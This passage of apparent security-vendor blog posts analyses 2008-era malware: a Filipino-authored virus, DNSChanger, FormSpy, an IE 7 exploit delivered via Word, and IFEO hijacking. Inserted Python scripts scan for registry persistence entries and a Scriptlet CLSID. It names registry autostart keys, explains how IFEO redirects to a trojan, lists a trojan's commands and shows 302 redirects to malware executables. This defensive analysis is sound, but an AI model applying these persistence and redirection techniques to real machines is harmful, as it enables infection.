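The probe deliberately records a 200 as None rather than failing, because the absence of a redirect for some vantage points is exactly the signal: a resource that only redirects visitors arriving from Google, and never the owner typing the URL, is the cloaking pattern described above.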

Other traffic management systems, like the one shown in the above picture, also feature different logins into the web interface: for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic (that is, infected web sites containing an IFRAME that points to the traffic management system) and buyers of traffic (i.e. the people who run exploit servers and try to install malware on unpatched computers, and are thus looking for potential victims). Such traffic management systems sit between the infected web sites and the exploit servers. As you can see in the above picture, payment options can also be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, campaigns can be easily exchanged or the “traffic” can be sold to new buyers who try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious resource nowadays means that you are redirected based on a complex server-side management system.

25C3: Nothing to Hide

The last major event of the year has just ended: The 25th Chaos Communication Congress’ Closing Ceremony just took place. Now in its 25th year, making it one of the oldest annual IT security conferences on the planet, more than 4,000 visitors crowded the BCC in Berlin, making it difficult to get into the talks, much like at Defcon some years ago.

For the talks: As always there was a healthy mix of technical, cultural, and society-related topics (the full schedule can be found here); surprising was the low number of local speakers talking about security problems or releasing tools. This may be related to a lot of confusion about the impact of recent German legislation banning “hackertools.” Recordings of all talks will eventually be available here.

Some of the highlights of the conference (yes, with four days and three parallel tracks I’m certainly missing some that should be mentioned) were Security Failures in Smart Card Payment Systems, by Steven Murdoch; Fabian Yamaguchi’s talk about TCP DoS Vulnerabilities; SWF and the Malware Tragedy, by BeF and fukami; FX of Phenoelit talking about the State of Attack/Defense of Routers (start watching your infrastructure, folks!) and finally the conference highlight, a talk about creating a rogue CA Certificate, by David Molnar, Marc Stevens, Benne de Weger, Arjen Lenstra, Dag Arne Oswig, Jacob Appelbaum, and Alex Sotirov. By taking advantage of known (and widely ignored) weaknesses of md5-signed certificates and bad implementation of a CA, they were able to create a Rogue CA Certificate, trusted by all browsers–OUCH!

A very interesting note concerning the Rogue CA talk: They didn’t give out any details on what they were planning to talk about until just before the talk itself. As they were afraid that someone or some company might try to gag them and prevent the talk from happening, they were discussing the content with affected parties only under NDA. Meaning: They made the other party sign the NDA, not the other, usual, way around!

This year there were a number of talks about mobile phone (in)security and about the GSM network in general, an interesting trend to follow in the next months/years. And at the very end a vulnerability affecting many Symbian-based phones, trivial to exploit manually, was released: SMSCurse (I’ve got no working link at the time of this writing). It basically crashes the SMS messaging on a phone and may require a factory reset to restore it, depending on the phone.

I took this as an opportunity to create a current backup of my phone–how old is your latest backup? :)

Have a Happy and Safe New Year!

Made In The Philippines

A small detail about a virus described in our virus information library recently caught my eye. The virus was W32/Greener (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=153430). The thing that jumped out at me was that the virus appends the string “Win32.Dakila” to the infected file.

“dakila” is a Filipino word meaning “great” in English. The proud Pinoy (colloquial, meaning Filipino) that I am, I had to investigate. The last time the Philippines was in malware-related news was in 2000, when VBS/Loveletter@MM (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=98617), a mass-mailing worm, broke out. It was said to have originated in the Philippines. Within a day of launch, millions of users received a “love letter” from someone they knew, containing a VBScript attachment. That was probably the earliest demonstration of the effective use of social engineering in malware. Before that, the common advice was to be wary of e-mails coming from someone you didn’t know. Since then, any email bearing attachments has become suspect.

There’s some good information on W32/Greener in our virus description but other than the word “dakila” nothing else indicated that it was authored in the Philippines. I decided to obtain a sample and dig deeper. Here’s what I found.

The virus was written in Visual Basic and is packed with UPX. When executed, the virus creates a copy of itself in the %windir% folder with a filename randomly chosen from a fixed list of names. The virus then searches for files with the .jpg or .JPG extension and replaces them with a file with the same name but with a .exe extension. The virus makes this new file appear as the original image file by:

1. Using the icon of an image file.
2. Making changes to Windows explorer settings to hide file extensions.
3. When double-clicked, the virus first re-creates the original .jpg file and opens it.

The virus also takes steps to hinder analysis and detection:

  • Disables the task manager
  • Disables registry editing
  • Disables the “Folder Options” item in the Windows Explorer menu
  • Terminates security-related processes
  • Strings (filenames, registry entries, etc.) in its body are in encrypted form

The virus ensures that it runs when Windows starts by creating the following registry entries:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\”<random word>” = “%windir%\<random word>.exe”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”<random word>” = “%windir%\<random word>.exe”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\”AlternateShell” = “%windir%\<random word>.exe”

    - an attempt to launch the virus automatically even in safe mode.

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”<well known executable>” = “%windir%\<random word>.exe”

    - this appears to be an attempt to have the virus launched when certain well-known programs are run. This is a known autorun method, but the author got it wrong and his/her implementation does not work.
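The autostart and self-defence settings listed above are all plain registry values, so they can be checked offline against an exported hive. The Python below is an added example, not code from the post or from McAfee: it parses the text form of a .reg export and flags the four persistence locations the post names (the two Run keys, SafeBoot AlternateShell, and Image File Execution Options, where it accepts both the correct Debugger value and the broken variant the post mentions), plus the self-defence policies. The policy value names (DisableTaskMgr, DisableRegistryTools, NoFolderOptions, HideFileExt) are the standard Windows names for the behaviour described and are an assumption of this example, not taken from the post; the sample export is constructed, and its file names are made-up Filipino words, not real indicators.

```python
import ntpath
import re
from typing import List, Tuple

# Autostart keys named in the post (compared case-insensitively).
RUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer\run",
}
SAFEBOOT_KEY = r"hkey_local_machine\system\currentcontrolset\control\safeboot"
IFEO_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options"
# Assumed standard policy names for the behaviour the post describes: (key suffix, value name) -> meaning.
POLICY_VALUES = {
    (r"policies\system", "disabletaskmgr"): "Task Manager disabled",
    (r"policies\system", "disableregistrytools"): "Registry editing disabled",
    (r"policies\explorer", "nofolderoptions"): "Folder Options menu item hidden",
    (r"explorer\advanced", "hidefileext"): "File extensions hidden (makes x.jpg.exe look like x.jpg)",
}

Entry = Tuple[str, str, str]  # (key, value name, data)


def parse_reg_export(text: str) -> List[Entry]:
    """Parse the [key] and "name"="data" lines of a .reg export. String data
    doubles backslashes; they are unescaped here. dword data is kept as written."""
    entries: List[Entry] = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and "=" in line:
            m = re.match(r'^(?:"([^"]*)"|@)=(?:"(.*)"|(.*))$', line)
            if m:
                name = m.group(1) if m.group(1) is not None else "(Default)"
                data = m.group(2).replace("\\\\", "\\") if m.group(2) is not None else m.group(3)
                entries.append((key, name, data))
    return entries


def _exe_path(data: str) -> str:
    """Strip quotes and arguments: 'C:\\dir\\x.exe /arg' -> 'C:\\dir\\x.exe'."""
    v = data.strip().strip('"')
    i = v.lower().find(".exe")
    return v[: i + 4] if i >= 0 else v


def suspicious_entries(entries: List[Entry], windir: str = r"C:\WINDOWS") -> List[Tuple[Entry, str]]:
    """Flag the persistence and self-defence settings described in the post."""
    findings: List[Tuple[Entry, str]] = []
    for entry in entries:
        key, name, data = entry
        k, n, exe = key.lower(), name.lower(), _exe_path(data)
        if k in RUN_KEYS and ntpath.dirname(exe).lower() == windir.lower():
            findings.append((entry, "Run entry launching a file directly from %windir%"))
        elif k == SAFEBOOT_KEY and n == "alternateshell" and ntpath.basename(exe).lower() != "cmd.exe":
            findings.append((entry, "SafeBoot AlternateShell replaced (runs even in Safe Mode)"))
        elif k.startswith(IFEO_KEY + "\\") and (n == "debugger" or exe.lower().endswith(".exe")):
            findings.append((entry, "IFEO hijack of " + ntpath.basename(key)))
        else:
            for (suffix, vname), meaning in POLICY_VALUES.items():
                if k.endswith(suffix) and n == vname and data.lower() == "dword:00000001":
                    findings.append((entry, meaning))
    return findings


# Constructed .reg export resembling an infected system (made-up names, not real indicators).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
"dakila"="C:\\WINDOWS\\dakila.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mahal"="C:\\WINDOWS\\mahal.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="C:\\WINDOWS\\dakila.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]
"Debugger"="C:\\WINDOWS\\dakila.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000001
"Hidden"=dword:00000002
"""

if __name__ == "__main__":
    for (key, name, data), why in suspicious_entries(parse_reg_export(SAMPLE_REG)):
        print(f"{why}\n    {key}\\{name} = {data}")
```

The Run-key rule is deliberately narrow (a launcher stored directly in %windir%, as this virus does) so that legitimate entries such as the system32 one in the sample are not reported; widen it to your environment's own baseline.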

The virus contains a time-triggered payload. When the time of day is 11:13 AM or 6:13 PM, the virus displays a message about global warming then initiates a shut down.

Going back to why I became interested in this virus in the first place, I confirmed that it must be Philippine-made. Countless Filipino words are used for filenames, form names, etc. Thankfully this one won’t have the same impact as VBS/Loveletter@MM because of its limited replication vectors.

A New spam circulating fake wire transfer statements

Today a new downloader trojan is being spammed widely. The spam message arrives as a reply to a query the victim supposedly sent asking about a wire transfer.

spam message

When users run the file “bank_statement.scr” from the attached zip file, it downloads the BackDoor-DSG trojan; at the same time it downloads an innocent PDF document from a legitimate site and opens it as a decoy. The PDF document, however, is not relevant to the wire transfer.

innocent pdf file

We see that the trojan file is repacked for each message, so no two are identical. In addition, this time the malware authors are changing resource sections in those PE files, such as icons and file properties.

For example, we observed following icons:

Icons

Other resources:

File Description:

  • Auto-reader Module
  • Reader_Module
  • Adobe Reader HSMC
  • Adodb_SSL_reader

Translation:

  • English
  • Spanish
  • Korean

CompanyName:

  • Adobe
  • ADOBE

These crafted resources, as well as the malicious code, are the result of server-side polymorphism to attempt to evade detections by Anti-Virus software. McAfee Avert Labs detects the current wave of the downloader as BackDoor-DSG.dldr trojan, and dropped files as BackDoor-DSG with DAT 5474 or later.

IE 7 Exploit Reloaded: The new face of Drive-by Attacks using Doc files

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft Word document being sent to an unsuspecting user.

Upon opening the Word document, the embedded ActiveX control with the following classid is instantiated and executed.

  • {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

ActiveX

The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.
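Since the only fixed artefact in this approach is the control's CLSID, a document scanner can look for it directly. The Python below is an added example, not code from the post or from McAfee; it searches raw file bytes for the CLSID named above in the three forms it can take inside an Office file: the braced registry-style text, the same text as UTF-16LE, and the 16-byte binary GUID as stored in OLE streams (Data1, Data2 and Data3 little-endian, Data4 as-is, which is exactly what uuid.UUID.bytes_le produces). The sample document is a constructed byte string, not a real malicious file.

```python
import uuid
from typing import Dict, List, Tuple

# CLSID of the Microsoft Scriptlet Component, as listed in the post.
SCRIPTLET_CLSID = uuid.UUID("AE24FDAE-03C6-11D1-8B76-0080C744F389")


def clsid_patterns(clsid: uuid.UUID) -> Dict[str, bytes]:
    """Byte patterns a CLSID can take inside an Office file."""
    text = "{" + str(clsid).upper() + "}"
    return {
        "binary_guid": clsid.bytes_le,              # how OLE/CompObj streams store it
        "text_ascii": text.encode("ascii"),         # e.g. inside RTF \objclass or HTML
        "text_utf16le": text.encode("utf-16-le"),   # Office's wide-string form
    }


def find_clsid(data: bytes, clsid: uuid.UUID = SCRIPTLET_CLSID) -> List[Tuple[int, str]]:
    """Return (offset, form) for every occurrence of the CLSID in raw bytes.
    Text forms match case-insensitively (bytes.upper only touches ASCII letters,
    so UTF-16LE NUL bytes are unaffected); the binary form is matched as-is."""
    hits: List[Tuple[int, str]] = []
    for form, pattern in clsid_patterns(clsid).items():
        haystack = data if form == "binary_guid" else data.upper()
        start = 0
        while (i := haystack.find(pattern, start)) != -1:
            hits.append((i, form))
            start = i + 1
    return sorted(hits)


def references_scriptlet_control(data: bytes) -> bool:
    """Verdict used by a mail or web gateway: any form of the CLSID present."""
    return bool(find_clsid(data))


# Constructed sample: OLE2 magic and padding, then the CLSID in binary and in
# lowercase text form. Offsets are those of this byte string, not of a real file.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
    + b"Lorem ipsum "
    + SCRIPTLET_CLSID.bytes_le
    + b" more "
    + b"{ae24fdae-03c6-11d1-8b76-0080c744f389}"
    + b" end"
)

if __name__ == "__main__":
    for offset, form in find_clsid(SAMPLE_DOC):
        print(f"offset {offset:5d}: {form}")
    print("references Scriptlet Component:", references_scriptlet_control(SAMPLE_DOC))
```

For the newer zipped formats (.docx and friends) run find_clsid over each extracted part, since the compressed container will not contain the patterns verbatim; for legacy .doc files the raw file bytes are enough, because OLE streams are stored uncompressed.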

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace.

DNSChanger: One Infection, Lots Of Problems

The infamous DNSChanger family again got into focus earlier this month, due to the fact that the latest variant is able to inject DHCP “Offer” packets containing rogue DNS server IP addresses into the network traffic. Therefore one infected computer in a network could pose a risk for all the other hosts using DHCP. In this blog entry, we want to outline what risk such network changes would pose.

Rogue DNSChanger servers can typically be found in the range 85.255.112.0/20 of “UkrTeleGroup”, formerly known as “Inhoster”. The oldest malware description in the McAfee Threat Library using these suspicious DNS servers is dated back to 2005 (see DNSChanger.a for more information). Scanning the whole network unveils more than 400 running DNS server instances at the moment. That is, ten percent of the whole IP range consists of nothing other than DNS servers. The whole network is believed to be even bigger, but not all servers in this range are answering to DNS requests at the moment.

A very serious issue with computers using these rogue DNS servers located in the Ukraine is that they resolve a number of security-related domains differently than a benign DNS server would do it. For example, DNSChanger-affected computers could access and surf to ‘www.microsoft.com’ without any changes, but are not able to download the latest updates from ‘download.microsoft.com’.

The 400+ DNS servers resolve the domain name to ‘127.0.0.1’, which means the computer tries to download the patches from the “localhost” address; the bad guys have thereby successfully blocked access to important updates. Other security-related domains, including ‘download.mcafee.com’, are blocked in the same way, as shown in the following screenshot:

The behavior is entirely controlled by the attackers’ DNS servers. These could even redirect existing domain names to servers hosting crafted content (Phishing) or servers dynamically modifying real content. Once your DNS settings are under control, the bad possibilities are unlimited. The criminals controlling these servers could also limit their attacks to regional locations or do their business from “dusk till dawn” to stay under the radar.

The good folks at the “Internet Storm Center” have suggested blocking or at least monitoring the entire range several times, starting in early 2006, because of the bad stuff coming out of this space. If you are a home or small business user and don’t want traffic routed to this Ukraine-based network, you could simply block access at the router level, as shown in the screenshot below. Many popular “Small Office / Home Office” devices offer such an ACL (Access Control List) feature.

Enterprise customers should force all clients within their network to use only the default DNS server(s) and block access to non-trustworthy servers at the gateway level, to ensure no one externally controls your DNS. Internet Service Providers could also mitigate the risk for their customers by dropping connections to these rogue DNS servers and additionally forcing their customers to use only the ISP’s controlled DNS servers.

From Fake Banking to Regionally Targeted Malware

From fake online banking to regionally targeted celeb porn - that’s just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started to promote a fake “Bank of America” web site, announcing a change of the online banking’s interface to its “customers.” For these “customers” to be able to have a quick look at the “demo” page, a preview link is provided as shown in the sample spam mail:

Example of fake banking spam

Innocent users who follow the lure by clicking the link are presented with a fake banking web site that uses the well-known missing-codec trick: the user is told that an additional component must be installed for a website or video to work. This time it is an apparent update for “Adobe Flash Player” which they require you to install for their “demo page” to work. The update of course isn’t legitimate software but a trojan.

We have taken a concise look under the trojan’s hood - it not only installs a rootkit but also collects private information from the infected computers. This information is leaked to a server using HTTP POST requests and in the end may either be sold or used to spread the attacking party’s malware further.

The embedded rootkit is written to harddisk once the trojan is executed - the rootkit driver’s Portable Executable header can be seen in the screenshot below.

Among this private information are POP3, IMAP and FTP server credentials but also credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan moreover is capable of receiving and executing commands from the malicious host that it phones home to, so the malware’s behavior may change and “improve” anytime.

The list of commands currently understood by this variant of the trojan is as follows:

  • “VER” - sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
  • “EXE” - updates itself by downloading a new version, storing the resulting executable to the Windows path. The filename is randomly chosen, depending on the current time
  • “DL” - downloads an executable from the Internet (but doesn’t run it)
  • “DL_EXE” - downloads and runs an executable from the Internet
  • “DL_EXE_ST” - downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
  • “REBOOT” - forces the computer to reboot

An additional spam run targeting Swiss Internet users has been reported by the “Reporting and Analysis Centre for Information Assurance MELANI” just yesterday. The mail, written in German language, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” or “Britney Spears in front of porn camera – scandal“. When following any link contained in the mail, the user is directed to one of many different malicious domains showing pages similar to the one seen below.

Just like with the fake banking web site mentioned above, the videos presented on this celeb page are claimed not to work without a codec - too bad! This time the user is lured with a high-definition video plugin named “Adobe Player HD plugin”. Again, this of course isn’t a missing codec but rather a trojan aimed at downloading further malware. Noteworthy about this downloader is that it contacts a web server with a traffic management system installed: depending on the user’s geo-location, different malware is delivered. While, for instance, a user from Germany will be sent a file called “de.exe”, …

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:33:58 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****.com/de.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

… a user from Switzerland will get “305.exe”:

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:39:48 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****/305.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

Comparing the malware currently spread by the malicious host, Swiss residents are delivered a variant of the same “Infostealer” family seen in the “Bank of America” spam campaign shown above, while users from Germany are delivered a spam bot instead. So spam mails are sent from victims in one country, and information is stolen from the computers of victims in another.

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”; additional coverage is in the 5461 DATs.

Click The Link Below: The Bad Habits That Create New Victims Of Online Fraud

Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common-sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today you’re likely to look at someone who’s never been on the Internet as an alien life form, a surprising number of new users are logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has proven only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complaints received, the typical kind of scam that would give your common sense a chance to flex - Nigerian 419 scams - represented a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email-based scams, and seeks to elicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit identity theft. Phishing is a smoke-and-mirrors trick designed to fool you into thinking you’re logging into your bank or credit card’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes consisted of over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004, only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 


Click This Link

After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.


Paste This Link

Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix, to prevent filters from seeing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.


Multiple Sign-On Domains

A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.


Multiple Sign-On Pages

In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.


Log In To Verify Your Account

Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.


Security Images

Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.


In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that does little to make them more resilient. None of these techniques will necessarily have any effect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mock-up site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.

Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

Image File Execution Options

Malware authors continue to find unique ways to ensure that their malicious code runs at system start-up.

One such method is through this lesser known registry key:

HKey_Local_Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

This registry key is intended to specify the name of a debugger (in this case “Olly Debugger”) which is launched to debug an application whenever that application starts.

For example:

To debug notepad.exe when it starts, one simply has to go to this registry key and create a subkey called notepad.exe.

A string value is then created for this subkey, assigned the name “debugger,” and given a value. In the case of Olly debugger, this is what it would look like:

This now ensures that every time the notepad application is invoked, Olly debugger runs instead, which, in turn, opens notepad, enabling it to be debugged.

Here’s the unique aspect about this registry key:

If we replace the debugging application (Olly debugger in this case) with a malicious executable (e.g., trojan.exe), the control will now be redirected to trojan.exe every time notepad.exe is run.

Microsoft intended this registry key to be a useful feature; however, there exists no mechanism whereby Windows can check whether the application to which control is being redirected is, in fact, a rogue application.

I managed to find information on this start-up method, which dates back to 2005. Unfortunately, malware authors are exploiting this very feature to:

1. Start up malicious files, even though the unsuspecting user intends to run another clean application
2. Disable security products, by redirecting the security products’ processes to malicious processes

Tools such as msconfig.exe, intended to check for start-up entries, are underequipped to handle this and do not detect applications that use this redirection technique. Users are advised to use “Autoruns” from Sysinternals instead.

See the screenshot below:

On a related note, the next time you happen to struggle with a severely infected machine with no anti-virus solution or with outdated signatures, you can redirect the malicious process to a clean file using the technique mentioned above.

For example, you can redirect “trojan.exe” to a “clean.exe”. See below:

The next time the malicious process tries to execute itself, the clean file will instead be executed, thus preventing the malicious file from spawning again. As always, remember to back up your registry before doing this.

Downloader Trojan Exploits Hole in IE 7

We have lost count of how many blogs we have written this year that have anything to do with zero-day threats or unpatched vulnerabilities.

Today, many Internet users in China have reported an infection, presumably from browsing the web using a fully patched version of Microsoft Internet Explorer 7.x. My colleague Xiaobo Chen and I investigated the incident and found it to be an active exploit containing downloader shellcode that installs the Downloader-AZN Trojan (proactively detected as New Malware.n since 2005 when scanning with heuristics enabled).

The root cause was found to be the incorrect handling of certain XML tags in Internet Explorer 7.x, which causes mshtml.dll to reference already freed memory.

We have confirmed this vulnerability to be affecting, at least, a fully patched Windows XP SP3 and a Vista SP1 system. The exploit uses publicly known heap-spray techniques that enable control over a vtable pointer, allowing arbitrary code execution.

Fortunately, the 5404 DATs proactively detect the Downloader-AZN Trojan, but there could be other variants. Additional coverage is going into today’s DATs to detect the malicious web scripts as Exploit-XMLhttp.d or Exploit-XMLhttp.c Trojan.

Details about this vulnerability, as well as exploit code, are known to be publicly available.

More information on this situation will be posted as it becomes available.

McAfee Releases Virtual Criminology Report, Edition 4

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific bank going under hits, scams and malware utilizing that messaging emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election: malware themed on President-Elect Barack Obama emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

